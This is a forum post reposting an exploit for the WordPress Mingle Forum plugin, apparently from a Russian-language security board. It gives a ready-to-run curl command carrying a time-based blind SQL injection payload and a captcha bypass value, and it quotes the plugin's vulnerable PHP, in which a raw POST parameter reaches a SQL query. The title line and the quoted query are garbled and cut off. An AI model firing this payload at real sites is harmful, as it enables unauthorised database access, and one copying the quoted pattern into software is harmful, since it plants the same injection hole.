13.10.2011, 20:49
|
|
Новичок
Регистрация: 19.05.2011
Сообщений: 26
С нами:
7886486
Репутация:
-1
|
|
Код:
# Exploit Title: WordPress Mingle Forum plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
---------------
Vulnerable code
---------------
if (!isset($_POST['edit_post_submit'])) {
$errormsg = apply_filters('wpwf_check_guestinfo',"");
if ($errormsg != "") {
$error = true;
wp_die($errormsg);
}
}
if($options['forum_captcha'] == true && !$user_ID){
include_once(WPFPATH."captcha/shared.php");
$wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
// do nothing
}
else {
$error = true;
$msg = __("Security code does not match", "mingleforum");
wp_die($msg);
}
}
...
if(isset($_POST['edit_post_submit'])){
$myReplaceSub = array("'", "\\");
$subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
$content = $mingleforum->input_filter($_POST['message']);
$thread = $mingleforum->check_parms($_POST['thread_id']);
$edit_post_id = $_POST['edit_post_id'];
if($subject == ""){
$msg .= "".__("An error occured", "mingleforum")."";
$msg .= ("".__("You must enter a subject", "mingleforum")."");
$error = true;
}
elseif($content == ""){
$msg .= "".__("An error occured", "mingleforum")."";
$msg .= ("".__("You must enter a message", "mingleforum")."");
$error = true;
}
if ($error) wp_die($msg);
//SECURITY FIX NEEDED t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
$wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)
|
|
|